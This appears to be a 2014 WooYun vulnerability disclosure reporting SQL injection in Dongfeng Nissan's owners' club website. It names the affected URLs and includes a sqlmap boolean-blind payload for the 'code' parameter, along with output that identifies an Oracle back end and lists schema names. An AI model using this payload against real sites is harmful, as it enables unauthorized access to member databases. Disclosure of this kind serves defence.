当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-076533

漏洞标题:东风日产官方俱乐部注入漏洞多处

相关厂商:dfyb.com

漏洞作者: Vigoss_Z

提交时间:2014-09-19 11:26

修复时间:2014-09-24 11:28

公开时间:2014-09-24 11:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-09-19: 细节已通知厂商并且等待厂商处理中
2014-09-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

rt

详细说明:

官方会员俱乐部,简介处:超过250万会员
多处注入漏洞
找回密码处:http://nclub.dongfeng-nissan.com.cn/MemberNew/FindPassWord.aspx
活动信息:http://owners.dongfeng-nissan.com.cn/MemberNew/ActivityDetail.aspx?code=ACTOPV130131R5133*&type=4
26个数据库:没跑完,只证明问题:

漏洞证明:

sqlmap identified the following injection points with a total of 90 HTTP(s) requests:
---
Place: GET
Parameter: code
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: code=ACTOPV130302I1600' AND 7060=7060 AND 'fRhn'='fRhn&type=4
---
[INFO] testing MySQL
[WARNING] the back-end DBMS is not MySQL
[INFO] testing Oracle
[INFO] confirming Oracle
[INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Oracle
[WARNING] schema names are going to be used on Oracle for enumeration
 as the counterpart to database names on other DBMSes
[INFO] fetching database (schema) names
[INFO] fetching number of databases
[WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[INFO] retrieved: 26
[INFO] retrieved: APEX_030200
[INFO] retrieved: APP
[INFO] retrieved: APPQOSSYS
[INFO] retrieved: CTXSYS
[INFO] retrieved: DBSNMP
[INFO] retrieved: DCRM
[INFO] retrieved: EXFSYS
[INFO] retrieved: FLOWS_030000
[INFO] retrieved: FLOWS_FILES
[INFO] retrieved: MDSYS
[INFO] retrieved: OLAPSYS

修复方案:

版权声明:转载请注明来源 Vigoss_Z@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-09-24 11:28

厂商回复:

最新状态:

暂无